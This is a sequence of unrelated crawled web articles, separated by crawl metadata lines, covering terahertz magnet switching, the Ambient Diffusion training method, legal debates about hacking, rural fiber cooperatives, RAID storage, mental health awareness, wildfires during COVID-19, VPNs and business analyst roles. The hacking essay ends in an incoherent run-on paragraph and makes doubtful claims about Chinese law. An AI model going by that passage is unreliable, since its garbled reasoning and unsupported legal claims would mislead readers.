and fabricated a very small antenna on top of the magnet to concentrate and thereby enhance the electric field of light. This strongest local electric field was sufficient to navigate the magnetisation of the magnet to its new orientation in just one trillionth of a second. The temperature of the magnet did not increase at all as this process requires energy of only one quantum of the terahertz light – a photon – per spin. Dr Mikhaylovskiy said, “The record-low energy loss makes this approach scalable. Future storage devices would also exploit the excellent spatial definition of antenna structures enabling practical magnetic memories with simultaneously maximal energy efficiency and speed.” He plans to carry out further research using the new ultrafast laser at Lancaster University, together with accelerators at the Cockroft Institute which are able to generate intense pulses of light to allow switching magnets and to determine the practical and fundamental speed and energy limits of magnetic recording.
<urn:uuid:b72899fc-499a-4d30-9b81-82d16dbcfbbc>
CC-MAIN-2024-38
https://datacentrereview.com/2019/05/scientists-use-light-pulses-to-create-energy-free-superfast-computing/
2024-09-18T18:45:17Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651931.60/warc/CC-MAIN-20240918165253-20240918195253-00676.warc.gz
en
0.929873
611
3.765625
4
Researchers at The University of Texas at Austin developed Ambient Diffusion, a framework for training AI models on corrupted images to prevent replication of copyrighted material Cutting-edge AI models face scrutiny for replicating copyrighted images. Researchers at The University of Texas at Austin develop Ambient Diffusion framework. Ambient Diffusion trains AI models solely on corrupted image-based data. Framework presented at NeurIPS and refined for broader applicability. Enables high-quality sample generation without exposure to original images. Balances performance and originality by controlling memorization. Highlights academia’s commitment to societal needs and AI advancement. Main AI News: In the realm of cutting-edge artificial intelligence (AI), errors are not uncommon occurrences. From fabricating false information to replicating others’ work erroneously, these instances can mar the reputation of otherwise potent AI models. Addressing this concern head-on, a team led by researchers at The University of Texas at Austin has pioneered a solution: a groundbreaking framework designed to train AI models using images rendered unrecognizable. DALL-E, Midjourney, and Stable Diffusion stand as prominent examples of text-to-image diffusion generative AI models. Their capacity to transform arbitrary textual inputs into remarkably lifelike images has sparked admiration and controversy alike. However, these models now find themselves entangled in legal disputes with artists who claim that the generated outputs bear striking resemblance to their copyrighted works. Trained on extensive datasets comprising billions of image-text pairs, these AI models boast the ability to generate high-fidelity visuals based on textual cues. Yet, therein lies a potential pitfall—they may inadvertently draw upon copyrighted images, thus replicating them without authorization. Enter Ambient Diffusion, the innovative framework poised to disrupt this status quo. Developed to circumvent such legal quandaries, this framework trains diffusion models exclusively on corrupted image-based data. Initial findings suggest that Ambient Diffusion enables the generation of high-quality samples without ever exposing the AI to recognizable source images. Presented initially at NeurIPS, a prestigious machine-learning conference, in 2023, Ambient Diffusion has since undergone refinement and expansion. A subsequent paper, “Consistent Diffusion Meets Tweedie,” published on the arXiv preprint server, has been accepted for presentation at the 2024 International Conference on Machine Learning. In collaboration with Constantinos Daskalakis of the Massachusetts Institute of Technology, the framework has been augmented to encompass training on datasets featuring images corrupted by diverse forms of noise, thereby extending its applicability. Adam Klivans, a distinguished professor of computer science involved in the development of Ambient Diffusion, underscores its broad utility beyond the realm of AI. “The framework could prove invaluable for scientific and medical endeavors,” he asserts. Indeed, applications abound in fields where obtaining pristine datasets proves arduous or prohibitively expensive, spanning from black hole imaging to specialized MRI scans. Klivans, alongside collaborator Alex Dimakis, a renowned professor of electrical and computer engineering, spearheaded the experimental validation of Ambient Diffusion. Leveraging a dataset comprising 3,000 images of celebrities, the researchers observed a transformative effect when employing the new framework. Whereas traditional diffusion models trained on uncorrupted data merely replicated training examples, Ambient Diffusion ushered in a paradigm shift. By systematically corrupting the training data—randomly masking up to 90% of individual pixels in an image—and retraining the model, the researchers achieved striking results. The generated samples retained their high quality while exhibiting distinct deviations from the original training images. This pivotal achievement underscores the framework’s capacity to strike a balance between performance and originality. Giannis Daras, a promising graduate student in computer science who spearheaded the research effort, emphasizes the framework’s inherent flexibility. “Our framework enables precise control over the trade-off between memorization and performance,” he explains. “As the level of corruption during training escalates, the model’s tendency to memorize the training set diminishes.” This adaptive mechanism offers a pathway to solutions that, while potentially altering performance metrics, steer clear of generating mere noise—a testament to the framework’s robustness and efficacy. The development of Ambient Diffusion epitomizes academia’s commitment to advancing AI technology in alignment with societal imperatives—a focal point at The University of Texas at Austin, which has designated 2024 as the “Year of AI.” With contributions from esteemed institutions such as the University of California, Berkeley, and MIT, this collaborative endeavor exemplifies the synergistic potential of interdisciplinary research in shaping the future of artificial intelligence. The introduction of the Ambient Diffusion framework signifies a pivotal step towards ethical AI development, particularly in addressing legal concerns surrounding image replication. By prioritizing originality and adaptability, this innovation not only mitigates copyright infringement risks but also opens doors to enhanced scientific and medical applications. As AI continues to evolve, businesses must remain vigilant in adopting frameworks like Ambient Diffusion to navigate ethical complexities and foster responsible innovation.
<urn:uuid:1dbe2671-9efa-4c7c-999d-48e95594fd99>
CC-MAIN-2024-38
https://multiplatform.ai/researchers-at-the-university-of-texas-at-austin-developed-ambient-diffusion-a-framework-for-training-ai-models-on-corrupted-images-to-prevent-replication-of-copyrighted-material/
2024-09-18T18:39:50Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651931.60/warc/CC-MAIN-20240918165253-20240918195253-00676.warc.gz
en
0.884577
1,056
2.828125
3
You’re about to ride on reading journey where you might’ve never went before, so let’s begin, shall we? In the modern era of technology, hackers are arguably playing an increasingly important role. They have been making a significant impact in various industries and across many aspects of our lives. As a result, debates about the legal implications of hacking and related regulations are actively occurring. This article will discuss the current legal and regulatory issues that come with hacking, exploring both positive and negative implications of this activity. One of the most important legal issues associated with hacking is copyright infringement. Hackers often attempt to access systems with copyright-protected content without permission from the copyright holder(s). This can result in serious civil liability for those found responsible, as well as potential criminal repercussions if there is alleged criminal intent or motive. Many countries are now strengthening their laws against copyright infringement and introducing harsher punishments for violators. For example, China recently ratified its Copyright Law, which significantly stiffened penalties for offenders caught infringing upon copyrighted materials online; such punishments include jail time or hefty fines. As such, it’s important for people to be aware of these laws so they can stay compliant while benefiting from new technologies. MAIN POINT #2 Another major debate revolves around computer crime legislation, which exists in many regions throughout the world to protect citizens’ digital privacy and security rights. In some cases, these laws give additional protection to corporations due to increased vulnerability caused by hackers attempting to gain unauthorized access to data or systems owned by companies; however, critics have argued that these laws are unnecessarily harsh and draconian when applied to individual users rather than organizations or commercial entities. Additionally, while some believe that regulating hacker activities may be an effective way to prevent malicious attacks on enterprises’ networks, others fear that such measures could lead to further criminalization of hackers who act out of curiosity or simply want to challenge their skillset rather than cause harm or data theft. Furthermore, debates about the ethical implications of hacking are actively being discussed as well in regards to Cyber Security Laws (CSL). Proponents argue that CSLs help protect individuals from malicious attacks by cyber-criminals seeking financial gain; however some opponents view CSLs as an intrusion into personal liberties due to their broad scope in regards to crackdowns on activities deemed illegal under these laws (e.g., accessing secured networks without authorization). For example, countries like China have adopted “Digital Rights Management” regimes where corporations have right-of-entry rights over citizens information if they suspect any security threats without necessarily proving any actual malicious intent before taking action against hackers – creating a system ripe with potential abuse-of-power scenarios depending on implementation factors specific circumstances surrounding individual cases prosecuted under said law framework(s). Finally, while discussions are ongoing regarding how best to legislate hacker activities – current questions remain unanswered such as whether existing regulations need more expansive definitions that could better define activities based risks posed than simply categorizing them solely based on provision’s breach? While statesmen continue debating solutions that seek bringing balance between ways internet usage should be allowed/restricted legally wise – much still comes down local governments discretion define what constitute illegal actions within respective territories at behest but risk limiting people’s ability innovate via technological feedback loop created opposition some types conduct thought condemned harmful despite intentions just because it requires circumventing rule sets engineer desired end results faster more efficiently wish disrupt least amount infrastructure after having gone work investigating details beforehand
<urn:uuid:464e9dea-2765-4ae7-8bc4-4f92c50b5b9f>
CC-MAIN-2024-38
https://hacklido.com/blog/189-discussions-on-current-legal-and-regulatory-issues-in-hacking
2024-09-20T01:40:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652073.91/warc/CC-MAIN-20240919230146-20240920020146-00576.warc.gz
en
0.933574
704
3.015625
3
BROADBAND BREAKFAST INSIGHT: Once again, the folks at the Institute for Local Self Reliance have produced another standout report on how to get better broadband to those parts of American that are not served by the major incumbents. This report focuses on the role that cooperatives are playing, and can continue to play, in making sure that the rural regions of our country are not left behind in the race for next-generation connectivity. The Fiber Future is Cooperative: Policy Brief On Rural Cooperative Fiber Deployment, from Institute for Local Self Reliance Rural communities across the United States are already building the Internet infrastructure of the future. Using a 20th century model, rural America is finding a way to tap into high-speed Internet service: electric and telephone cooperatives are bringing next-generation, Fiber-to-the-Home (FTTH) networks to their service territories. This policy brief provides an overview of the work that cooperatives have already done, including a map of the cooperatives’ fiber service territories. We also offer recommendations on ways to help cooperatives continue their important strides. Download the policy brief, Cooperatives Fiberize Rural America: A Trusted Model For The Internet Era here. Key Facts & Figures Farmers first created utility cooperatives because large private companies did not recognize the importance of connecting rural America to electricity or telephone service. Now, these cooperatives are building fiber infrastructure. Almost all of the 260 telephone cooperatives and 60 electric cooperatives are involved in fiber network projects. As of June 2016, 87 cooperatives offer residential gigabit service (1,000 Mbps) to their members. Rural cooperatives rely on more than 100 years of experience. The cooperative approach does not stop with rolling out rural infrastructure, but ensures that their services remain viable and affordable. The majority of Montana and North Dakota already have FTTH Internet access, thanks to rural cooperatives. Even one of the poorest counties in the country (Jackson County, Kentucky) has FTTH through a telephone cooperative. AT&T receives about $427 million each year in rural subsidies to bring Internet service to rural America, but AT&T does not invest in rural fiber networks.
<urn:uuid:dadbb780-2e8f-4247-81e0-a6ff5c1b492c>
CC-MAIN-2024-38
https://broadbandbreakfast.com/new-resource-from-institute-for-local-self-reliance-on-building-fiber-in-rural-america/
2024-09-07T20:03:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00776.warc.gz
en
0.941165
449
2.53125
3
Stepping into the data storage realm, one of the phrases that generates a hive of activity is RAID, an acronym for Redundant Array of Independent Disks. Like the backbone of the human body, RAID offers significant integral support to modern data storage systems. This piece aims to demystify RAID, delving into its rich history, the nuts and bolts of its operation, and the rationale behind its critical role in data storage. An exploration into the numerous benefits of using RAID, from improved data protection to enhanced performance, and comprehensive guidance on its practical implementation beckons. Moreover, glancing an eye into the future, an examination of emerging trends and future projections about RAID promises to enhance the understanding of this focal point in data storage. Technology is evolving at a rapid pace, turning sci-fi dreams into absolute realities. Amongst these numerous technological advancements, one that’s taken the tech world by storm is the RAID system– a Redundant Array of Independent Disks. This technology is essentially shaping and redefining data storage. Accordingly, every tech enthusiast needs to know about RAID, given its significance for reliable and efficient data storage. In layman’s terms, RAID is a method of storing the same data across multiple hard disks to achieve a blend of enhanced speed, data protection, and improved performance. Such an interplay of hard disks acts like a cohesive system, ensuring your data is not reliant on a single device and is practically insulated against disk failures. RAID is not a single strategy but a composite plethora of methods, each possessing its unique set of advantages. For instance, RAID 0 splits data across multiple drives, improving speed and performance. Meanwhile, RAID 1 duplicates the same data on two hard disks, offering complete redundancy and backup. RAID 5, a commonly adopted approach, distributes parity along with the data, boosting data protection. For those looking at maximizing speed and data protection simultaneously, RAID 10 is the answer, as it combines the capabilities of RAID 0 and RAID 1. In the digital age, the importance of data can hardly be understated. It’s the basis for decision-making trend prediction and holds incredible monetary value. This makes RAID a crucial player in the tech world. Its principal benefit lies in its redundancy. A hard drive failure can lead to catastrophic losses. By providing multiple copies of data, RAID protects against such potential nightmares. RAID boosts overall performance and speed. It divides the workload among multiple disks. This process, known as ‘striping’, enhances data access and read-write speeds. Consequently, RAID has become an indispensable tool for data-intensive tasks and processes. RAID also offers a cost-effective data storage solution. It allows the use of cheaper, smaller disks in an array without compromising on storage capacity or performance. However, keep in mind that RAID is not a universal magic solution. It does not replace the need for regular data backups, nor does it protect against data corruption or viruses. That said, when implemented correctly, RAID can raise the reliability and performance of storage systems to previously unimaginable heights. In a world where data is the new currency, technology like RAID is more than just a matter of convenience or speed. It becomes a necessity, a guardian of our digital treasures. By understanding and leveraging its capabilities, we can take our relationship with technology to the next level – one of minimal manual intervention, maximum automation, and unparalleled efficiency. Dive into the world of RAID today and open doors to accelerated performance and unparalleled data protection. Benefits of RAID In a rapidly evolving digital landscape, RAID, or Redundant Array of Independent Disks, establishes a reliable platform for data storage and retrieval. One of the salient advantages of RAID is its impactful role in data management and recovery. In essence, RAID’s real strength lies in its innate ability to counter data loss. This feat is achieved through redundancy; ‘mirroring’ and ‘parity’ are the two fundamental principles enabling this function. In RAID systems, redundancy ensures that multiple copies of data are stored across different drives. As such, even if one disk fails, the data remains available on other disks, thereby mitigating the risk of losing critical information. Mirroring, primarily utilized in RAID 1 and RAID 10, is about duplicating the entire data from one drive onto another. If one drive malfunctions, the system continues to operate seamlessly with undisturbed data access. Moreover, recovery becomes straightforward and relatively speedy since the secondary drive remains an intact copy of the failed one. Parity, integrated into RAID 5 and RAID 6 systems, offers an even more robust solution for data recovery. It stems from creating a ‘parity bit.’ This unique piece of information can reconstruct the entire chunk of data from the remaining drives in case of a disk failure. Although parity can incur a slight performance cost, it grants a strong guard against data loss and provides an efficient recovery process. Above and beyond the realm of data recovery, RAID positions itself as an enabler of effective data management. Given RAID’s capability of splitting and distributing data across multiple drives (striping), the system allows concurrent data reading and writing operations. Performance-wise, this means data can be accessed and processed at a faster rate, boosting overall system efficiency. Furthermore, depending on the RAID level, one can achieve a balance between cost, performance, and data protection, providing more flexibility in managing diverse data requirements. However, RAID is not the silver bullet for all data woes. For instance, while RAID provides recovery options from hardware failures, it might not aid in software corruption or user mishandling scenarios. For this reason, maintaining regular data backups becomes imperative for comprehensive information security. Worth noting is the rise of cloud-based solutions and hybrid systems that harp on RAID’s strengths and can counter its drawbacks. In today’s digitalized world, RAID continues to serve as an ace in effective data management and recovery. When the stakes are high, RAID provides a unique blend of data protection, improved performance, and cost-effectiveness. That’s why this bit of ‘old school’ tech remains highly pertinent, even in the flexible, diverse digital era today. With advanced systems, embracing the full potential of RAID beyond traditionally perceived boundaries is the road to creating an integrated, resilient, and high-performing digital ecosystem. It’s time to delve deeper into the nuts and bolts of how RAID can be implemented in your system. This may seem intimidating but fear not – implementing RAID is much less complex than it might initially appear, and the benefits are undoubtedly worth it. To be successful in embracing RAID, begin with understanding the hardware requirements. Despite the virtual nature of RAID, hardware is critical. A RAID controller, typically available as either an integrated motherboard component or a separate expansion card, will be necessary to facilitate the interaction of multiple hard drives. The disk drives themselves are also a key consideration. Remember that different RAID levels could demand a higher number of drives. The drive’s speed, capacity, brand, and model should be identical for optimal drive array performance and stability. Once the hardware is sorted, choose the RAID level that fits the system’s needs in terms of performance and data protection. RAID configuration should be determined based on your specific requirements. Whether it’s RAID 1 for mirroring and redundancy, RAID 0 for a striped set without fault tolerance, or RAID 10 for a combination of both, the chosen setup has to reflect the system’s needs accurately. Ultimately, setting up RAID involves configuring the RAID controller through the system BIOS (Basic Input/Output System) or UEFI (Unified Extensible Firmware Interface). Once in the configuration utility, create a new array, select the necessary drives, and pick the RAID level. Remember to carry out this important step during the system’s initial setup or after backing up any important data. Next, install the operating system, ensuring that all updates and patches are applied to avoid any known issues with RAID. Often, RAID controllers require a specific driver that may not be natively included with the OS. Don’t forget to install any necessary driver for the RAID controller during the OS installation process. After the operating system has been installed, the RAID array should show as a single, united disk drive. The RAID controller will manage the distribution of data, duplicating, splitting, or combining it depending on the configured RAID level. An integral part of implementing RAID is managing it. Be sure to monitor the RAID arrays routinely to detect any possible issues early. Most RAID controllers provide software for monitoring RAID health. Last but not least, remember that RAID is not an ultimate data protection solution. Even in operable RAID arrays, hard drives can still fail unpredictably. So, regular off-site data backups and verifying the integrity of those backups is an essential complement to employing RAID in a system. In conclusion, the benefits of implementing RAID in a system are immense as RAID offers superior performance, provides data redundancy, and enhances the speed of data storage and retrieval. With sound knowledge, meticulous planning, and careful implementation – achieving a successful RAID setup is entirely within reach. RAID’s Future Perspectives Emerging Trends Impacting RAID Technology With an existing foundation about RAID and its broad scope, let’s dive into what the future holds for RAID, primarily shaped by emerging trends and technologies. The rise of solid-state drives (SSDs), offering superior performance and resilience over traditional hard drives, will significantly impact RAID configurations. SSDs inherently accommodate the input/output demands placed on RAID systems, delivering superior lifespan, speed, and reduced power consumption. Consequently, RAID types that distribute parity data across the array, like RAID 5 and RAID 6, can benefit hugely from the enhanced endurance of SSDs. However, because SSDs are more expensive, the cost savings associated with RAID might not be as pronounced. Meanwhile, the prevalence of Big Data and Internet of Things (IoT) devices collect and process vast amounts of data. To manage these demands, enterprises will look to implement larger RAID arrays to provide adequate storage and performance. It’s vital, however, to ensure adequate fault tolerance in these configurations, as a single drive failure could take days to rebuild and severely degrade performance. Further, the advent of cloud technology and cloud storage services adds a new dimension to data redundancy and backup. Technically, RAID and cloud storage are two sides of the same coin, both aimed at ensuring the reliability and accessibility of data. The utilization of RAID alongside cloud-based backups is an innovative step towards enhanced data protection, offering each method’s unique advantages. Artificial intelligence could play a part in the future of RAID arrays as well. Machine learning algorithms could be used to optimize and manage RAID arrays dynamically, ensuring maximum performance and reliability based on changing user needs and workloads. Last but not least, the proliferation of Software-Defined Storage (SDS) will revolutionize RAID configurations as it abstracts the software services from the physical storage hardware, offering flexible and independent RAID scalability. With SDS and RAID together, the storage pool can be resilient against single and multiple failures with an optimized balance between storage capacity, performance, and protection. And so, as RAID technology adjusts to accommodate these emerging trends, its longevity may not be at risk, as some have postulated. Rather, the role of RAID is evolving from its conventional objectives towards a more adaptable, dynamic tool in the broad landscape of data protection and redundancy. By walking hand in hand with these trends, RAID is poised to continue its critical role in the new digital age – ever-changing but definitely enduring. RAID’s future is indisputably intertwined with the development of technology and the escalating demands in data storage. The discussion thus far underscores RAID’s vitality, with its multifaceted benefits of data redundancy, augmented performance, and robust data protection. However, to fully harness its potential, meticulous consideration is needed when implementing different RAID configurations and technologies. As technology surges forward, RAID systems will inevitably adapt and evolve in tandem, responding to emerging trends and advancements. Looking ahead, RAID will undeniably pivot towards new horizons in data storage, shaping and impacting myriad facets of our digital existence.
<urn:uuid:21870873-f5fe-4f8b-bffa-70df788533b3>
CC-MAIN-2024-38
https://cyberexperts.com/hard-drive-raid/
2024-09-07T21:36:26Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00776.warc.gz
en
0.908711
2,523
3.1875
3
Most of us feel that we’ve lost control over our lives right now. City and school re-openings are unknown, and for many life seems to be turned upside down with no clear end in sight. Even with all the chaos and uncertainty going on, there is one thing we can control which is our efforts to safeguard our mental health and wellbeing. Today, February 3, 2022, marks the annual Time to Talk Day. This social movement is designed to help create supportive communities where people are able to start conversations around mental health and feel empowered to seek help when they need it. This day aims to encourage people to not only be open about their personal struggles, but to do it without fear or stigma which is often associated to this topic. - Nearly 1 in 5 adults live with mental illness - 9 out of 10 people with mental health problems say that stigma and discrimination has a negative effect on their lives - Suicide is the 10th leading cause of death in the U.S. - Members of LGTBQ+ communities are almost 3 times more likely to experience a mental health condition such as major depression or generalized anxiety disorder - 1 in 6 children aged 5-16 are likely to have a mental health problem - 55% of 16-25 year old’s say they had seen their doctor about mental health at some point in their lives We all go through tough times, but there is no simple way of knowing if someone is struggling with mental health. Many mental illnesses have been identified and defined including depression, anxiety, obsessive compulsive disorder and many more. Although there are common symptoms specific to certain mental health challenges, not everyone reacts the same way, making it difficult to spot. Understanding how to respond to someone with mental health issues is crucial and can make a world of a difference to someone who may be feeling alone. Here are some ways you can show your support: - Listen: Set time aside with no distractions. Ask open-ended questions to allow them to share their experiences with you and help them feel heard - Celebrate wins: Every day is a challenge. Celebrate their accomplishments, no matter how big or small they may be - Do your research: Educate yourself and learn more about mental health. Understanding these challenges will help you to understand their experiences and be aware of those who are at risk - Check in regularly: Those struggling with mental health already often feel like a burden to others. Check in regularly, keep them company and always remind them that they are loved and there to support them in any way possible If you or someone you know is experiencing mental health issues and is seeking support, speak to your doctor, tell someone you trust, or contact mental health services. For more blogs related to mental health, check out the following:
<urn:uuid:cc4cfd7d-26c2-4e8b-bd32-3f75b062cb7d>
CC-MAIN-2024-38
https://www.netsweeper.com/education-web-filtering/time-talk-day-2022
2024-09-07T20:50:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00776.warc.gz
en
0.97077
568
3.109375
3
Wildfire Season and COVID-19 Author: Madison Littin Around this time every year, the news begins showing footage of raging fires, burnt homes, and exhausted families and firefighters. Although peak wildfire season depends on the state, most wildfires in the U.S. occur during the summer to early fall months. As wildfires appear to be getting worse, a new challenge presents itself in 2020: the coronavirus pandemic. Every agency – from the governmental level to private businesses – will need to be aware of this lingering threat and address their usual incident management plans as such. Points of Consideration May Be: Health Precautions for the Front-line Firefighters, public officials, vendors, and other responders coordinating wildfire efforts are usually placed in large camps. However, with social distancing requirements and lack of proper hygiene, responders need to find other ways of safely running camps. Some agencies have opted to turn hotels into their incident command centers or create larger camps with limited close contact. Firefighters are at greater risk of catching COVID-19 as well due to smoke inhalation and group suppression efforts; it’s potentially dangerous to expose a whole camp to the virus, which could limit the amount of responders to fight the actual fire. Are there policies in place to check the health of responders on a daily basis? What back up options are there in case the virus greatly reduces the number of firefighters? Will there be adequate medical supplies for firefighters? Reduced Mitigation and Response Efforts As the coronavirus pandemic swept the nation, spring clearing of underbrush and reduced funding have left forests in prime condition for severe fires. Instead of focusing on wildfire planning and recruiting, firefighters were out receiving increased 911 calls. Now in the summer (and as fall approaches), coronavirus cases are still rising as researchers expect a second wave. Will wildfire camps have enough support from firefighters as they’re fighting two disasters on two fronts? Will other counties/agencies/states be able to provide additional firefighters? Will there still be a flow of funding towards fighting fires as the pandemic continues on? Additional Stress on Civilians As of this writing, more than 45 million Americans have filed for unemployment since the pandemic began. Residents – sick, unemployed, or otherwise struggling – may not have the resources to flee or follow evacuations. Losing your home and all your possessions is devastating; losing all of this during a global pandemic is even worse. Where will agencies be sending evacuees? Will social distancing and safety guidelines be in place during evacuations? Will families have proper support systems to recover financially and physically? If stay-at-home orders/quarantine return, what plans are in place for those recently displaced? Additionally, small businesses have suffered greatly from the shutdowns. Will they have the financial means to recover from a second disaster? Are their emergency plans updated with regards to wildfires? Enhanced Communications and Monitoring Both pandemics and wildfires are long, constantly evolving crises; the pandemic has been ongoing since February (with no signs of stopping), and wildfires can last for weeks or months at a time. A shift in wind direction or a new outbreak can mean an entire change in response efforts. Authorities will need to be extra vigilant and more communicative, both internally among wildfire crew and externally to citizens and businesses. How will changes in pandemic response affect wildfire suppression efforts and vice versa? Will different methods of communication have to be used? How do you balance messages of concern for the pandemic and for wildfires? One unique takeaway from pandemic/wildfire season is the dual use of masks, as many people are already wearing them to help prevent the spread of COVID-19. However, only N95 masks are capable of protecting the wearer from wildfire smoke – and smoke can be widespread; it’s not uncommon to see people several towns away from the fire’s edge to be wearing masks as the wind blows the smoke. It’s important that enough masks are produced for first responders, front-line medical workers, and citizens. Has the supply chain been restored after the initial wave of COVID-19? Will there be enough masks to meet the evolving demand of wildfire smoke and coronavirus response? The Fire Management Board has already created several guidelines for fighting wildfires during the coronavirus pandemic and serves as a great place to reference when updating your emergency incident management software. It’s important to keep up to date on best practices as well as maintain a sense of empathy. Times are hard, and we need everyone to work together in order to weather these crises.
<urn:uuid:d41159bd-1726-478f-9c6e-10100b09b328>
CC-MAIN-2024-38
https://www.fusionrm.com/blogs/wildfire-season-and-covid-19/
2024-09-11T13:07:59Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651387.63/warc/CC-MAIN-20240911120037-20240911150037-00476.warc.gz
en
0.956098
945
2.578125
3
In today’s digital age, where online privacy is becoming increasingly important, Virtual Private Networks (VPNs) have emerged as an essential tool for protecting our personal information and ensuring a secure online experience. But what exactly are VPNs and how do they play a significant role in online security? Let’s take a closer look. Firstly, let’s define what a VPN is. Essentially, a VPN is a service that creates a secure, encrypted connection between your device and the internet. It works by routing your internet traffic through a remote server operated by the VPN provider, thereby masking your IP address and encrypting your data. This makes it almost impossible for anyone to intercept or view your online activities. Now that we know what a VPN does, let’s explore how it enhances online security. One of the primary advantages of using a VPN is that it prevents unauthorized access to your personal information. When connected to a VPN, your data is encrypted, making it extremely difficult for cybercriminals and hackers to intercept and decrypt your sensitive information, such as passwords, credit card details, and browsing history. Furthermore, VPNs also play a significant role in protecting your online identity. By masking your IP address with that of the VPN server, you can surf the web anonymously, without leaving behind a trace of your online activities. This adds an extra layer of security when accessing public Wi-Fi networks, which are notorious for being prime targets for hackers looking to steal personal information. Another aspect of online security that VPNs address is geo-blocking. Many websites and streaming platforms enforce regional restrictions, limiting access to content based on your location. With a VPN, you can bypass these restrictions by connecting to a server in a different country. This not only allows you to access a broader range of content, but it also adds an extra level of privacy as your true location remains hidden. It’s important to note that VPNs are not foolproof and do have limitations. While they provide security for your online activities, they do not protect against malware or viruses. Therefore, it’s crucial to combine the use of a VPN with other cybersecurity measures, such as using anti-virus software and practicing safe browsing habits. In conclusion, VPNs are powerful tools that protect your online privacy and enhance your overall online security. By encrypting your data, masking your IP address, and allowing you to bypass geo-blocks, they provide a safer and more secure online experience. However, it’s important to remember that VPNs are just one piece of the cybersecurity puzzle, and it’s essential to adopt a holistic approach to ensure comprehensive protection in the digital world.
<urn:uuid:cc667518-c5a9-473d-98d5-dc7ed6c5cdbb>
CC-MAIN-2024-38
https://garage4hackers.com/understanding-vpns-and-their-role-in-online-security/
2024-09-12T19:59:34Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651491.39/warc/CC-MAIN-20240912174615-20240912204615-00376.warc.gz
en
0.934852
549
3.0625
3
Business analysis, business analyst are very well-known terms nowadays. But, do you know what exactly a business analyst is or who is a business analyst? So, here you will get the answers to these questions. Business analysts are the people who play a very keen role in the progress of any industry. They are the one who is responsible for maintaining the coordination between IT Cell and the Business. They collect all the data which is business-related and then combine it and form conclusions about what is good for the business and what is not. In this way, they make the progression faster and easier. In this blog we will mainly discuss: - Who is a business analyst - What a business analyst does - Skills needed to become a good business analyst - Difference between a business analyst and data analyst - How to become a business analyst Who is a Business Analyst Business analysts have appeared to be a crucial part of recent business scenarios. Are you also among those who think that the role of business analysts is to make money for the company? Yes, it is true but not directly as the action and decision making of business analysts leave an impact on the financial prospects of the company. Business Analysts work inside a company to assess current systems and create vital plans. This requires deep information on both the particular business and industry patterns. Therefore, a critical part of the business analyst job is conveying plans between internal departments and external stakeholders. The role of the business analyst is to present change in an association. Change may incorporate evasion of expenses, recognizing new chances, acknowledging and making new advantages, and many more. Business analysts create or update computer systems to figure out business requirements. Business analysts are the one who gives necessities to the IT division to deliver this new mechanical system and aids the testing and usage of the system. Companies employ business analysis for several reasons like to comprehend the structure and the elements of the association wherein a system is to be conveyed and to guarantee that the client, end client, and designers have a typical comprehension of the objective association. (Most related: 8 Most Popular Business Analysis Techniques used by Business Analyst) Business Analyst Skills Basically, a good business analyst should understand that there is a need to have a combination of both hard and soft skills and they are judged on these skills. Being a victorious business analyst implies that you have to have a mixture of numerous skills and be flexible to a shifting environment. So, let's have a look at some of the skills which you need if you want to become a good business analyst. So, you must have understood what this point is going to speak about. If you want to become a good business analyst then you have to know how to deal with different people. You need to supervise team partners, forecast the budget, support squad members with difficulties, and many more such tasks. You have to feel confident in a leadership role to earn acceptance for strategies from administrators in the corporation. Business analysts may utilize a wide scope of technical programs, comprising programs for charting, information crunching, wireframing, the board of necessities, and for the introduction of results. To an ever-increasing extent, business analysts are expanding their specialized capability with information on computer programming, huge information mining methods, and data set administration. So, in simple words, we can say that if a business analyst is in the IT department then few technical factors are required to learn such as operating systems, hardware capacities, database concepts, networking, and many more. (Recommend blog: Dark side of Information Technology (IT) Industry) Business Analyst skills Excellent analytical skills will cleanse a good business analyst. So, a favorable part of the business analyst position encompasses analyzing data, workflow, user or stakeholders inputs, and so on for determining which course of action will benefit the business issue. Strong analytical skills are beneficial in executing the business analyst’s job properly. Business Analysts have to work in groups, so he/she needs to be good at communication. They have to receive information and submit it to wide-ranging stakeholders in the corporation, translate and negotiate between groups, and communicate explanations conveniently. Fluent language skills and written communication abilities being integral for thriving in a business analyst career hence if one wants to be a good business analyst they have to improve their writing and speaking skills. Business knowledge and essential thinking Business Analysts must comprehend numerous aspects of the organization for whom they are working. They should have the option to comprehend the parts of various people and offices, and how these offices communicate and rely upon one another. They should likewise comprehend the single association in a more extensive set of the whole business. This business information will at that point permit them to effectively break down information focuses and construct vital designs for what's to come. There are many more skills needed for becoming a good business analyst such as you need to understand your objectives, good listening skills, the ability to run stakeholder meetings, hone your presentation skill, learn time management, develop your modeling skill, stakeholder management, and many more. What Does a Business Analyst Do? A business analyst investigates sets of information searching for approaches to expand proficiency in a corporation. Thus, in this way the business analyst frequently goes about as a contact between various divisions in an organization, discovering approaches to smooth out cycles all through the corporation. The business analyst must have the option to discuss well with these various groups in the company, once in a while going about as a representative, and introducing arrangements in manners that colleagues and stakeholders will comprehend. Business Analysts may convey a wide range of arrangements, including new strategies, information models, flowcharts, or key plans. A professional business analyst plays a massive part in pushing a company toward efficiency, productivity, and profitability. Business Analyst take part in four primary kinds of analysis- Strategic Planning- distinguishing changing requirements of an organization. Business model analysis- characterizing arrangements and market approaches. Process design- normalizing work processes. System analysis- understanding of necessities for the IT division. There are different business analyst roles and it can be from any area, and the position varies based on the area. So, business analysts are categorized into numerous sectors such as Business Analyst, System Analyst, Business Process Analyst, IT Business Analyst, Business System Analyst, Usability or UX Analyst, Data Analyst, and Functional Architect. Business Analyst vs Data Analyst Business analysts adopt data for identifying issues and solutions, yet they don’t perform a deep technical analysis for the data, operating at a conceptual level by defining approaches and interacting with stakeholders, being mainly concerned with the data’s business associations. Data analysts spend their majority of time in accumulating raw data from multiple sources, clearing and revamping it, and affixing a range of specialized techniques for extracting effective information and forming conclusions. Business analysts hold extensive experience in domains or industries like healthcare, e-commerce, or manufacturing, they depend less on the technical aspects of analysis Data analysts put more emphasis on the technical aspects of the 